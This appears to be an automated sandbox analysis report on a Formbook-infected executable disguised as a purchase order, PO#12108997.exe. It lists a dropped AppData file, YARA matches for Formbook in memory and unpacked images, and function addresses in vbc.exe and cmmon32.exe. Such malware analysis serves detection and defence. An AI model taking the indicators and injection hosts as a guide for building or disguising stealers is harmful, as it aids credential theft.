          Source: C:\Windows\SysWOW64\cmmon32.exeDropped file: C:\Users\user\AppData\Roaming\3NM010Q7\3NMlogrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)
          Source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: PO#12108997.exe
          Source: PO#12108997.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\PO#12108997.exeCode function: 0_2_01B94360
          Source: C:\Users\user\Desktop\PO#12108997.exeCode function: 0_2_01B940B1
          Source: C:\Users\user\Desktop\PO#12108997.exeCode function: 0_2_01B940C0
          Source: C:\Users\user\Desktop\PO#12108997.exeCode function: 0_2_05DA4DD0
          Source: C:\Users\user\Desktop\PO#12108997.exeCode function: 0_2_05DAACD8
          Source: C:\Users\user\Desktop\PO#12108997.exeCode function: 0_2_05DAF851
          Source: C:\Users\user\Desktop\PO#12108997.exeCode function: 0_2_05DAF860
          Source: C:\Users\user\Desktop\PO#12108997.exeCode function: 0_2_05DABA28
          Source: C:\Users\user\Desktop\PO#12108997.exeCode function: 0_2_092D9B90
          Source: C:\Users\user\Desktop\PO#12108997.exeCode function: 0_2_092D003B
          Source: C:\Users\user\Desktop\PO#12108997.exeCode function: 0_2_092D0040
          Source: C:\Users\user\Desktop\PO#12108997.exeCode function: 0_2_092D0BBD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041E83B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041ED4F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041E5CB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_00409E5B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_00409E60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041EE02
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041D754
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041E7C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05641D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05642D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05570D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0558D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056425DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0563D466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0558841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05641FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564DFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05596E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0563D616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05642EF7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557F900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05594120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055999BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564E824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05631002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559A830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056428EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0558B090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056420A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559AB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05642B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0563DBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056303DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AEBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0562FA2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056422AE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A6841F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B1D466
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A82581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A6D5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B225DD
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A50D20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B22D07
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B21D55
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B22EF7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A76E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B1D616
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B21FF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B2DFCE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A820A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B220A8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A6B090
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B228EC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B2E824
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7A830
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B11002
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A799BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A74120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A5F900
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B222AE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B0FA2B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8EBB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B1DBD2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B103DA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8ABD8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B22B28
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7A309
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7AB40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007DE83B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007DED4F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007DE5CB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007C2D90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007C9E60
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007C9E5B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007DEE02
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007DE7C3
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_007C2FB0
